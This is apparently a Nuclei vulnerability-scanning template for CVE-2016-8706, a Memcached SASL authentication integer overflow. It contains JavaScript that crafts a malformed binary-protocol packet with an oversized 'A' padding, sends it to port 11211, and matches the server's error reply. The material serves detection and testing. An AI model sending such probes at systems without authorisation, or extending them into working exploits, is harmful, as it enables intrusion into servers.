id: CVE-2016-8706

info:
  name: Memcached Server SASL Authentication - Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.
  reference:
    - https://github.com/Medicean/VulApps/blob/master/m/memcached/cve-2016-8706/poc.py
    - https://nvd.nist.gov/vuln/detail/CVE-2016-8706
    - http://rhn.redhat.com/errata/RHSA-2016-2819.html
    - http://www.debian.org/security/2016/dsa-3704
    - http://www.securitytracker.com/id/1037333
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2016-8706
    cwe-id: CWE-190
    epss-score: 0.91612
    epss-percentile: 0.9865
    cpe: cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: memcached
    product: memcached
    verfied: true
  tags: cve,cve2016,rce,js,memcached
javascript:
  - code: |
      let packet = bytes.NewBuffer();
      packet.Write(new Uint8Array([0x80, 0x21]))
      let cmd = 'stats'
      packet.WriteString(cmd)
      packet.Pack("!H", [32]);
      packet.Pack("!I", [1]);
      let buzz = Array(1000).fill("A").join('');
      packet.WriteString(buzz)
      const c = require("nuclei/net");
      let conn = c.Open('tcp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());
      conn.RecvString();
    args:
      Host: "{{Host}}"
      Port: 11211

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Invalid arguments"

      - type: word
        words:
          - "Auth failure"
        negative: true
# digest: 490a004630440220679c0fed3309ef12d46db2927b7aa6d9934c5b2ce37560aa32edd8145bcb3176022019a2e1bc0a2ffec8ad9b0f617f906a74d520ea7dd8c53dccebc8ab03a57549dc:922c64590222798bb761d5b6d8e72950